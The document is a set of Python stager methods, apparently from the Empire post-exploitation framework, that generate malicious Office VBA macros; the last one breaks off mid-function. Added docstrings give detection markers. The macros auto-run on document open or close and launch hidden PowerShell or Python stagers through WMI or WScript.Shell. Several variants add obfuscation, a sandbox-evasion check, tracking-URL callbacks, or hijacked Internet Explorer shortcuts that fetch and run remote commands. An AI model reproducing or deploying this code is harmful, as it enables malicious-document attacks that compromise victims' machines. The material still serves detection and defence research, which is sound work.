Exemple #1
    def generate(self):
        """Build a VBA macro that starts the listener's launcher through WMI.

        Reads the stager options, asks ``self.mainMenu.stagers`` for an encoded
        launcher and returns the macro source as one string. Prints an error
        and returns "" when the launcher comes back empty.

        Markers in the emitted VBA that matter for detection and triage:
        auto-run entry points (AutoOpen, Document_Open), a command string
        assembled by repeated concatenation of short literals, and process
        creation through ``winmgmts:`` / ``Win32_Process.Create`` with a
        ``Win32_ProcessStartup.ShowWindow`` of 0.
        """

        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        obfuscate = self.options['Obfuscate']['Value']
        obfuscateCommand = self.options['ObfuscateCommand']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']

        # the option arrives as text; only the string "true" (any case) enables it
        obfuscateScript = False
        if obfuscate.lower() == "true":
            obfuscateScript = True

        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
        # The VBA variable name (Str) and function name (Method) are random
        # letters, 1..len(listenerName) characters long, so they differ on every
        # run; signatures should key on the macro's structure, not on these names.
        # string.letters and the print statement below make this Python 2 code.
        Str = ''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName))))
        Method=''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName))))

        if launcher == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
            # helpers.chunks is called with 50 -- presumably 50-character pieces
            # (helper not shown). Each piece becomes one VBA string literal with
            # embedded double quotes doubled, appended to the same variable.
            chunks = list(helpers.chunks(launcher, 50))
            payload = "\tDim "+Str+" As String\n"
            payload += "\t"+Str+" = \"" + str(chunks[0]).replace("\"", "\"\"") + "\"\n"
            for chunk in chunks[1:]:
                payload += "\t"+Str+" = "+Str+" + \"" + str(chunk).replace("\"", "\"\"") + "\"\n"

            macro = "Sub Auto_Open()\n"
            macro += "\t"+Method+"\n"
            macro += "End Sub\n\n"
            # NOTE: plain assignment, not +=, so the Auto_Open sub built just
            # above is not part of the returned macro; only AutoOpen and
            # Document_Open remain as entry points.
            macro = "Sub AutoOpen()\n"
            macro += "\t"+Method+"\n"
            macro += "End Sub\n\n"

            macro += "Sub Document_Open()\n"
            macro += "\t"+Method+"\n"
            macro += "End Sub\n\n"

            # The worker function: rebuilds the command string, then creates the
            # process through WMI with a startup configuration whose ShowWindow
            # is HIDDEN_WINDOW (0).
            macro += "Public Function "+Method+"() As Variant\n"
            macro += payload
            macro += "\tConst HIDDEN_WINDOW = 0\n"
            macro += "\tstrComputer = \".\"\n"
            macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
            macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
            macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
            macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
            macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
            macro += "\tobjProcess.Create "+Str+", Null, objConfig, intProcessID\n"
            macro += "End Function\n"

            return macro
Exemple #2
    def generate(self):
        """Build a VBA macro whose command string is padded with noise characters.

        Reads the stager options, requests an encoded launcher and passes it
        through ``self.addnoise`` (not shown here), which returns the altered
        launcher and a noise string. The emitted VBA removes every character of
        the noise string from the command before running it, so the literals
        stored in the document are not the command that finally executes; an
        analyst has to apply the same ``replace`` loop to recover it.

        Prints an error and returns "" when the launcher comes back empty.
        """

        # extract all of our options
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']
        # int() raises ValueError when the option is not a whole number
        noiselevel = int(self.options['NoiseLevel']['Value'])

        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)

        if launcher == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
            launcher, noise = self.addnoise(launcher, noiselevel)
            # helpers.chunks is called with 50 -- presumably 50-character pieces
            # (helper not shown); each piece is one VBA literal appended to "str".
            chunks = list(helpers.chunks(launcher, 50))
            payload = "\tDim Str As String\n"
            payload += "\tDim Noise As String\n"
            payload += "\tDim Counter As Integer\n"
            payload += "\tnoise = \"" + noise + "\"\n"
            payload += "\tstr = \"" + str(chunks[0]) + "\"\n"
            for chunk in chunks[1:]:
                payload += "\tstr = str + \"" + str(chunk) + "\"\n"

            # VBA loop that strips each noise character out of the command string
            payload += "\tFor counter = 1 to len(noise)\n"
            payload += "\tstr = replace(str,mid(noise,counter,1),\"\")\n"
            payload += "\tNext\n"

            macro = "Sub Auto_Open()\n"
            macro += "\tDebugging\n"
            macro += "End Sub\n\n"
            # NOTE: plain assignment, not +=, so the Auto_Open sub built just
            # above is not part of the returned macro.
            macro = "Sub AutoOpen()\n"
            macro += "\tDebugging\n"
            macro += "End Sub\n\n"

            macro += "Sub Document_Open()\n"
            macro += "\tDebugging\n"
            macro += "End Sub\n\n"

            # Fixed function name "Debugging"; the process is created through
            # WMI with a startup configuration whose ShowWindow is 0.
            macro += "Public Function Debugging() As Variant\n"
            macro += payload
            macro += "\tConst HIDDEN_WINDOW = 0\n"
            macro += "\tstrComputer = \".\"\n"
            macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
            macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
            macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
            macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
            macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
            macro += "\tobjProcess.Create str, Null, objConfig, intProcessID\n"
            macro += "End Function\n"

            return macro
Exemple #3
    def generate(self):
        """Build a VBA macro that starts the listener's launcher through WMI.

        Reads the stager options, requests an encoded launcher and returns the
        macro source as one string; prints an error and returns "" when the
        launcher comes back empty.

        All identifiers in the emitted VBA are fixed ("Debugging", "str"). The
        command is stored as short literals concatenated into "str" and is
        started with ``Win32_Process.Create`` using a startup configuration
        whose ShowWindow is 0.
        """

        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']

        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(
            listenerName,
            language=language,
            encode=True,
            userAgent=userAgent,
            proxy=proxy,
            proxyCreds=proxyCreds,
            stagerRetries=stagerRetries)

        if launcher == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
            # helpers.chunks is called with 50 -- presumably 50-character pieces
            # (helper not shown); each piece is one VBA literal appended to "str".
            chunks = list(helpers.chunks(launcher, 50))
            payload = "\tDim Str As String\n"
            payload += "\tstr = \"" + str(chunks[0]) + "\"\n"
            for chunk in chunks[1:]:
                payload += "\tstr = str + \"" + str(chunk) + "\"\n"

            macro = "Sub Auto_Open()\n"
            macro += "\tDebugging\n"
            macro += "End Sub\n\n"
            # NOTE: plain assignment, not +=, so the Auto_Open sub built just
            # above is not part of the returned macro.
            macro = "Sub AutoOpen()\n"
            macro += "\tDebugging\n"
            macro += "End Sub\n\n"

            macro += "Sub Document_Open()\n"
            macro += "\tDebugging\n"
            macro += "End Sub\n\n"

            # worker function: command string first, then the WMI process creation
            macro += "Public Function Debugging() As Variant\n"
            macro += payload
            macro += "\tConst HIDDEN_WINDOW = 0\n"
            macro += "\tstrComputer = \".\"\n"
            macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
            macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
            macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
            macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
            macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
            macro += "\tobjProcess.Create str, Null, objConfig, intProcessID\n"
            macro += "End Function\n"

            return macro
Exemple #4
    def generate(self):
        """Build one VBA macro with separate macOS and Windows branches.

        Requests two launchers from ``self.mainMenu.stagers`` -- a Python one
        and one in the configured language -- and substitutes them, together
        with the PixelTrackURL option, into a fixed macro template. Prints an
        error and returns "" when either launcher comes back empty.

        Markers in the emitted VBA that matter for detection and triage:
        a ``Declare ... system Lib "libc.dylib"`` line, ``curl`` and
        ``Microsoft.XMLHTTP`` requests to the tracking URL with a platform
        suffix (Mac2011, Mac2016, Windows), a base64 blob piped to ``python3``,
        ``Win32_Process.Create`` with ShowWindow 0, and ``On Error Resume Next``
        hiding any runtime failure from the user.
        """
        def formStr(varstr, instr):
            # Render instr as VBA assignments to varstr: the first 54 characters
            # in the opening assignment, the rest appended in 48-character
            # pieces, lines separated by CRLF.
            holder = []
            str1 = ''
            str2 = ''
            str1 = varstr + ' = "' + instr[:54] + '"'
            for i in range(54, len(instr), 48):
                holder.append('\t\t' + varstr + ' = ' + varstr + ' + "' +
                              instr[i:i + 48])
                str2 = '"\r\n'.join(holder)
            str2 = str2 + "\""
            str1 = str1 + "\r\n" + str2
            return str1

        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        obfuscate = self.options['Obfuscate']['Value']
        obfuscateCommand = self.options['ObfuscateCommand']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']
        safeChecks = self.options['SafeChecks']['Value']
        pixelTrackURL = self.options['PixelTrackURL']['Value']
        scriptLogBypass = self.options['ScriptLogBypass']['Value']
        AMSIBypass = self.options['AMSIBypass']['Value']
        AMSIBypass2 = self.options['AMSIBypass2']['Value']

        # The flags below arrive as text; only the string "true" (any case)
        # enables one. They are forwarded to generate_launcher unchanged -- what
        # each does to the launcher is decided there, not in this method.
        invokeObfuscation = False
        if obfuscate.lower() == "true":
            invokeObfuscation = True

        scriptLogBypassBool = False
        if scriptLogBypass.lower() == "true":
            scriptLogBypassBool = True

        AMSIBypassBool = False
        if AMSIBypass.lower() == "true":
            AMSIBypassBool = True

        AMSIBypass2Bool = False
        if AMSIBypass2.lower() == "true":
            AMSIBypass2Bool = True

        # generate the python launcher code
        pylauncher = self.mainMenu.stagers.generate_launcher(
            listenerName,
            language="python",
            encode=True,
            userAgent=userAgent,
            safeChecks=safeChecks)

        if pylauncher == "":
            print(
                helpers.color(
                    "[!] Error in python launcher command generation."))
            return ""

        # render python launcher into python payload
        # Only the text between single quotes is kept; with several quoted
        # spans the last one wins, and pypayload stays unbound if there is none.
        pylauncher = pylauncher.replace("\"", "\"\"")
        for match in re.findall(r"'(.*?)'", pylauncher, re.DOTALL):
            pypayload = formStr("str", match)

        # generate the powershell launcher code
        poshlauncher = self.mainMenu.stagers.generate_launcher(
            listenerName,
            language=language,
            encode=True,
            obfuscate=invokeObfuscation,
            obfuscationCommand=obfuscateCommand,
            userAgent=userAgent,
            proxy=proxy,
            proxyCreds=proxyCreds,
            stagerRetries=stagerRetries,
            safeChecks=safeChecks,
            scriptLogBypass=scriptLogBypassBool,
            AMSIBypass=AMSIBypassBool,
            AMSIBypass2=AMSIBypass2Bool)

        if poshlauncher == "":
            print(
                helpers.color(
                    "[!] Error in powershell launcher command generation."))
            return ""

        # render powershell launcher into powershell payload
        # helpers.chunks is called with 50 -- presumably 50-character pieces
        # (helper not shown). No closing quote is written after a piece here.
        poshchunks = list(helpers.chunks(poshlauncher, 50))
        poshpayload = "Dim Str As String"
        poshpayload += "\n\t\tstr = \"" + str(poshchunks[0])

        for poshchunk in poshchunks[1:]:
            poshpayload += "\n\t\tstr = str + \"" + str(poshchunk)

        # if statements below are for loading Mac dylibs for compatibility
        # The three %s slots are filled, in order, with the tracking URL, the
        # Python payload (Mac branch) and the PowerShell payload (Windows branch).
        macro = """#If Mac Then
    #If VBA7 Then
        Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
    #Else
        Private Declare Function system Lib "libc.dylib" (ByVal command As String) As Long
    #End If
#End If

Sub AutoOpen()
    'MsgBox("AutoOpen()")
    Debugging
End Sub

Sub Auto_Open()
    'MsgBox("Auto_Open()")
    Debugging
End Sub

Sub Document_Open()
    'MsgBox("Document_Open()")
    Debugging
End Sub

Public Function Debugging() As Variant
    On Error Resume Next
            Dim tracking As String
            tracking = "%s"
            #If Mac Then
                'Mac Rendering
                If Val(Application.Version) < 15 Then 'Mac Office 2011
                    system ("curl " & tracking & "Mac2011")
                Else 'Mac Office 2016
                    system ("curl " & tracking & "Mac2016")
                End If
                Dim result As Long
                Dim str As String
                %s
                'MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | python3 &")
                result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | python3 &")
            #Else
                'Windows Rendering
                Dim objWeb As Object
                Set objWeb = CreateObject("Microsoft.XMLHTTP")
                objWeb.Open "GET", tracking & "Windows", False
                objWeb.send
                %s
                'MsgBox(str)
                Set objWMIService = GetObject("winmgmts:\\\\.\\root\cimv2")
                Set objStartup = objWMIService.Get("Win32_ProcessStartup")
                Set objConfig = objStartup.SpawnInstance_
                objConfig.ShowWindow = 0
                Set objProcess = GetObject("winmgmts:\\\\.\\root\cimv2:Win32_Process")
                objProcess.Create str, Null, objConfig, intProcessID
            #End If
End Function""" % (pixelTrackURL, pypayload, poshpayload)

        return macro
Exemple #5
    def generate(self):
        """Build a VBA macro that starts the listener's launcher through WMI.

        Reads the stager options, requests an encoded launcher and returns the
        macro source as one string; prints an error and returns "" when the
        launcher comes back empty.

        The emitted VBA has three auto-run entry points (Auto_Open, AutoOpen,
        Document_Open) that all call one randomly named function. That function
        rebuilds the command from short concatenated literals and starts it
        with ``Win32_Process.Create`` using a startup configuration whose
        ShowWindow is 0.
        """

        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        obfuscate = self.options['Obfuscate']['Value']
        obfuscateCommand = self.options['ObfuscateCommand']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']

        # the option arrives as text; only the string "true" (any case) enables it
        obfuscateScript = False
        if obfuscate.lower() == "true":
            obfuscateScript = True

        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(
            listenerName,
            language=language,
            encode=True,
            obfuscate=obfuscateScript,
            obfuscationCommand=obfuscateCommand,
            userAgent=userAgent,
            proxy=proxy,
            proxyCreds=proxyCreds,
            stagerRetries=stagerRetries)
        # The VBA variable name (Str) and function name (Method) are random
        # letters, 1..len(listenerName) characters long, so they differ on every
        # run; signatures should key on the macro's structure, not on these names.
        # string.letters and the print statement below make this Python 2 code.
        Str = ''.join(
            random.choice(string.letters)
            for i in range(random.randint(1, len(listenerName))))
        Method = ''.join(
            random.choice(string.letters)
            for i in range(random.randint(1, len(listenerName))))

        if launcher == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
            # helpers.chunks is called with 50 -- presumably 50-character pieces
            # (helper not shown). Each piece becomes one VBA string literal with
            # embedded double quotes doubled, appended to the same variable.
            chunks = list(helpers.chunks(launcher, 50))
            payload = "\tDim " + Str + " As String\n"
            payload += "\t" + Str + " = \"" + str(chunks[0]).replace(
                "\"", "\"\"") + "\"\n"
            for chunk in chunks[1:]:
                payload += "\t" + Str + " = " + Str + " + \"" + str(
                    chunk).replace("\"", "\"\"") + "\"\n"

            # three auto-run subs, all appended with +=, so all three are emitted
            macro = "Sub Auto_Open()\n"
            macro += "\t" + Method + "\n"
            macro += "End Sub\n\n"
            macro += "Sub AutoOpen()\n"
            macro += "\t" + Method + "\n"
            macro += "End Sub\n\n"

            macro += "Sub Document_Open()\n"
            macro += "\t" + Method + "\n"
            macro += "End Sub\n\n"

            # worker function: command string first, then the WMI process creation
            macro += "Public Function " + Method + "() As Variant\n"
            macro += payload
            macro += "\tConst HIDDEN_WINDOW = 0\n"
            macro += "\tstrComputer = \".\"\n"
            macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
            macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
            macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
            macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
            macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
            macro += "\tobjProcess.Create " + Str + ", Null, objConfig, intProcessID\n"
            macro += "End Function\n"

            return macro
    def generate(self):
        """Build a VBA macro that runs the launcher when the document is closed.

        Reads the stager options, requests a launcher (encoded only when the
        Base64 option is "true") and returns the macro source as one string;
        prints an error and returns "" when the launcher comes back empty.

        Markers in the emitted VBA that matter for detection and triage: the
        only entry point is ``AutoClose``, so nothing runs while the document
        is merely open; the command is run with ``WScript.Shell`` ``Run``
        rather than WMI; and, when the OutlookEvasion option is on, the macro
        first issues WMI queries against ``Win32_ComputerSystemproduct`` and
        ``Win32_logicaldisk`` and stops on a match with hard-coded values.
        """

        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        base64 = self.options['Base64']['Value']
        obfuscate = self.options['Obfuscate']['Value']
        obfuscateCommand = self.options['ObfuscateCommand']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']
        safeChecks = self.options['SafeChecks']['Value']
        scriptLogBypass = self.options['ScriptLogBypass']['Value']
        AMSIBypass = self.options['AMSIBypass']['Value']
        AMSIBypass2 = self.options['AMSIBypass2']['Value']
        OutlookEvasion = self.options['OutlookEvasion']['Value']

        # The flags below arrive as text; only the string "true" (any case)
        # enables one. All but OutlookEvasion are forwarded to generate_launcher,
        # which decides what they do to the launcher.
        encode = False
        if base64.lower() == "true":
            encode = True

        invokeObfuscation = False
        if obfuscate.lower() == "true":
            invokeObfuscation = True

        scriptLogBypassBool = False
        if scriptLogBypass.lower() == "true":
            scriptLogBypassBool = True

        AMSIBypassBool = False
        if AMSIBypass.lower() == "true":
            AMSIBypassBool = True

        AMSIBypass2Bool = False
        if AMSIBypass2.lower() == "true":
            AMSIBypass2Bool = True

        OutlookEvasionBool = False
        if OutlookEvasion.lower() == "true":
            OutlookEvasionBool = True

        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(
            listenerName,
            language=language,
            encode=encode,
            obfuscate=invokeObfuscation,
            obfuscationCommand=obfuscateCommand,
            userAgent=userAgent,
            proxy=proxy,
            proxyCreds=proxyCreds,
            stagerRetries=stagerRetries,
            safeChecks=safeChecks,
            scriptLogBypass=scriptLogBypassBool,
            AMSIBypass=AMSIBypassBool,
            AMSIBypass2=AMSIBypass2Bool)
        # The VBA variable name (Str) and function name (Method) are random
        # letters, 1..len(listenerName) characters long, so they differ on every
        # run; signatures should key on the macro's structure, not on these names.
        Str = ''.join(
            random.choice(string.ascii_letters)
            for i in range(random.randint(1, len(listenerName))))
        Method = ''.join(
            random.choice(string.ascii_letters)
            for i in range(random.randint(1, len(listenerName))))

        if launcher == "":
            print(helpers.color("[!] Error in launcher command generation."))
            return ""
        else:
            # helpers.chunks is called with 50 -- presumably 50-character pieces
            # (helper not shown); each piece is one VBA literal appended to the
            # same variable. Embedded double quotes are not doubled here.
            chunks = list(helpers.chunks(launcher, 50))
            payload = "\tDim " + Str + " As String\n"
            payload += "\t" + Str + " = \"" + str(chunks[0]) + "\"\n"
            for chunk in chunks[1:]:
                payload += "\t" + Str + " = " + Str + " + \"" + str(
                    chunk) + "\"\n"

            # single entry point: runs on document close
            macro = "Sub AutoClose()\n"
            macro += "\t" + Method + "\n"
            macro += "End Sub\n\n"

            macro += "Public Function " + Method + "() As Variant\n"

            # Optional environment check: the emitted VBA ends execution when the
            # system product IdentifyingNumber or a logical disk size equals one
            # of the hard-coded values -- presumably those of a known scanning or
            # analysis host; verify against the option's description.
            if OutlookEvasionBool == True:
                macro += "\tstrComputer = \".\"\n"
                macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\cimv2\")\n"
                macro += "\tSet ID = objWMIService.ExecQuery(\"Select IdentifyingNumber from Win32_ComputerSystemproduct\")\n"
                macro += "\tFor Each objItem In ID\n"
                macro += "\t\tIf StrComp(objItem.IdentifyingNumber, \"2UA20511KN\") = 0 Then End\n"
                macro += "\tNext\n"
                macro += "\tSet disksize = objWMIService.ExecQuery(\"Select Size from Win32_logicaldisk\")\n"
                macro += "\tFor Each objItem In disksize\n"
                macro += "\t\tIf (objItem.Size = 42949603328#) Then End\n"
                macro += "\t\tIf (objItem.Size = 68719443968#) Then End\n"
                macro += "\tNext\n"

            # command string, then execution through WScript.Shell
            macro += payload
            macro += "\tSet asd = CreateObject(\"WScript.Shell\")\n"
            macro += "\tasd.Run(" + Str + ")\n"
            macro += "End Function\n"

            return macro
Exemple #7
    def generate(self):
        """Build one VBA macro with separate macOS and Windows branches.

        Requests a Python launcher and a PowerShell launcher from
        ``self.mainMenu.stagers`` and substitutes them, together with the
        PixelTrackURL option, into a fixed macro template. Prints an error and
        returns "" when either launcher comes back empty. Python 2 code
        (``xrange``, print statement).

        Markers in the emitted VBA that matter for detection and triage:
        a ``Declare ... system Lib "libc.dylib"`` line, ``curl`` and
        ``Microsoft.XMLHTTP`` requests to the tracking URL with a platform
        suffix (Mac2011, Mac2016, Windows), a base64 blob piped to
        ``/usr/bin/python``, ``Win32_Process.Create`` with ShowWindow 0, and
        ``On Error Resume Next`` hiding any runtime failure from the user.
        """
        def formStr(varstr, instr):
            # Render instr as VBA assignments to varstr: the first 54 characters
            # in the opening assignment, the rest appended in 48-character
            # pieces, lines separated by CRLF.
            holder = []
            str1 = ''
            str2 = ''
            str1 = varstr + ' = "' + instr[:54] + '"'
            for i in xrange(54, len(instr), 48):
                holder.append('\t\t' + varstr + ' = '+ varstr +' + "'+instr[i:i+48])
                str2 = '"\r\n'.join(holder)
            str2 = str2 + "\""
            str1 = str1 + "\r\n"+str2
            return str1

        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']
        safeChecks = self.options['SafeChecks']['Value']
        pixelTrackURL = self.options['PixelTrackURL']['Value']

        # generate the python launcher code
        pylauncher = self.mainMenu.stagers.generate_launcher(listenerName, language="python", encode=True, userAgent=userAgent, safeChecks=safeChecks)

        if pylauncher == "":
            print helpers.color("[!] Error in python launcher command generation.")
            return ""

        # render python launcher into python payload
        # Only the text between single quotes is kept; with several quoted
        # spans the last one wins, and pypayload stays unbound if there is none.
        pylauncher = pylauncher.replace("\"", "\"\"")
        for match in re.findall(r"'(.*?)'", pylauncher, re.DOTALL):
            pypayload = formStr("str", match)

        # generate the powershell launcher code
        # (language is fixed to "powershell" here; the Language option read
        # above is not used for this call)
        poshlauncher = self.mainMenu.stagers.generate_launcher(listenerName, language="powershell", encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)

        if poshlauncher == "":
            print helpers.color("[!] Error in powershell launcher command generation.")
            return ""

        # render powershell launcher into powershell payload
        # helpers.chunks is called with 50 -- presumably 50-character pieces
        # (helper not shown). No closing quote is written after a piece here.
        poshchunks = list(helpers.chunks(poshlauncher, 50))
        poshpayload = "Dim Str As String"
        poshpayload += "\n\t\tstr = \"" + str(poshchunks[0])
        for poshchunk in poshchunks[1:]:
            poshpayload += "\n\t\tstr = str + \"" + str(poshchunk)

        # if statements below are for loading Mac dylibs for compatibility
        # The three %s slots are filled, in order, with the tracking URL, the
        # Python payload (Mac branch) and the PowerShell payload (Windows branch).
        macro = """#If Mac Then
    #If VBA7 Then
        Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
    #Else
        Private Declare Function system Lib "libc.dylib" (ByVal command As String) As Long
    #End If
#End If

Sub Auto_Open()
    'MsgBox("Auto_Open()")
    Debugging
End Sub

Sub Document_Open()
    'MsgBox("Document_Open()")
    Debugging
End Sub

Public Function Debugging() As Variant
    On Error Resume Next
            Dim tracking As String
            tracking = "%s"
            #If Mac Then
                'Mac Rendering
                If Val(Application.Version) < 15 Then 'Mac Office 2011
                    system ("curl " & tracking & "Mac2011")
                Else 'Mac Office 2016
                    system ("curl " & tracking & "Mac2016")
                End If
                Dim result As Long
                Dim str As String
                %s
                'MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | /usr/bin/python &")
                result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | /usr/bin/python &")
            #Else
                'Windows Rendering
                Dim objWeb As Object
                Set objWeb = CreateObject("Microsoft.XMLHTTP")
                objWeb.Open "GET", tracking & "Windows", False
                objWeb.send
                %s
                'MsgBox(str)
                Set objWMIService = GetObject("winmgmts:\\\\.\\root\cimv2")
                Set objStartup = objWMIService.Get("Win32_ProcessStartup")
                Set objConfig = objStartup.SpawnInstance_
                objConfig.ShowWindow = 0
                Set objProcess = GetObject("winmgmts:\\\\.\\root\cimv2:Win32_Process")
                objProcess.Create str, Null, objConfig, intProcessID
            #End If
End Function""" % (pixelTrackURL, pypayload, poshpayload)

        return macro
    def generate(self):
        """Build a VBA macro that rewrites two Internet Explorer shortcuts.

        Returns the macro source as a string and, as a side effect, writes an
        XML file to the XmlOutFile path holding the last space-separated token
        of the generated launcher inside ``<command><a><execute>``. Prints an
        error and returns "" when that token is empty.

        The emitted VBA does not run a command itself. It creates or overwrites
        ``iexplore.lnk`` on the desktop and ``Internet Explorer.lnk`` under the
        pinned-taskbar folder so that each targets ``powershell.exe`` with
        ``-w hidden -nop -enc <blob>`` while keeping the ``iexplore.exe`` icon.
        The encoded command starts Internet Explorer, loads the XML document
        from the XmlUrl option and pipes the decoded ``execute`` node to IEX.
        For detection and triage: an Office process writing .lnk files, and a
        shortcut whose target is PowerShell but whose icon is a browser.

        This block mixes tabs and spaces for indentation (Python 2 only).
        """

        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']
        # lnkPath, path and name are assigned here but not used again in this method
	lnkPath = self.options['LNKPath']['Value']
	XmlPath = self.options['XmlUrl']['Value']
	XmlOut = self.options['XmlOutFile']['Value']
	regParts = XmlPath.split("\\")
	path = "\\".join(regParts[0:len(regParts)-1])
	name = regParts[len(regParts)-1]

        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
        # keep only the last space-separated token -- presumably the encoded
        # command without the interpreter and its switches; verify against
        # generate_launcher's output format
	launcher = launcher.split(" ")[-1]

        if launcher == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
            # payload is still built, but the line that would append it to the
            # macro is commented out below, so it never reaches the output
            chunks = list(helpers.chunks(launcher, 50))
            payload = "\tDim encRP As String\n"
            payload += "\tencRP = \"" + str(chunks[0]) + "\"\n"
            for chunk in chunks[1:]:
                payload += "\tencRP = encRP + \"" + str(chunk) + "\"\n"

            # single entry point: Auto_Open calls the Office function
            macro = "Sub Auto_Open()\n"
            macro += "\tOffice\n"
            macro += "End Sub\n\n"


            macro += "Public Function Office() As Variant\n"
           # macro += payload
	
	    macro += "Dim myWS As Object, lnk as Object\n"
	    macro += "Set myWS = CreateObject(\"Wscript.Shell\")\n"
# first shortcut: creates or replaces iexplore.lnk on the user's desktop
	    macro += "Set lnk = myWS.CreateShortcut(myWS.SPecialFolders(\"desktop\") & \"\\iexplore.lnk\")\n"
	    
            # PowerShell that the shortcut will run: start the real browser, load
            # the XML document from XmlPath, decode its execute node and run it
	    launchString1 = "[System.Diagnostics.Process]::Start(\"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\");$b = New-Object System.Xml.XmlDocument;$b.Load(\""
	    launchString2 = "\");[Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String($b.command.a.execute))|IEX\n"

	    macro += "lnk.targetpath = \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe \"\n"

            # letter case is randomized by the helper before encoding, so the
            # decoded command text varies between generated macros
	    launchString1 = helpers.randomize_capitalization(launchString1)
	    launchString2 = helpers.randomize_capitalization(launchString2)
	    launchString = launchString1 + XmlPath + launchString2
	    encLaunch = helpers.enc_powershell(launchString)
	    macro += "lnk.arguments = \"-w hidden -nop -enc " + encLaunch + "\"\n"
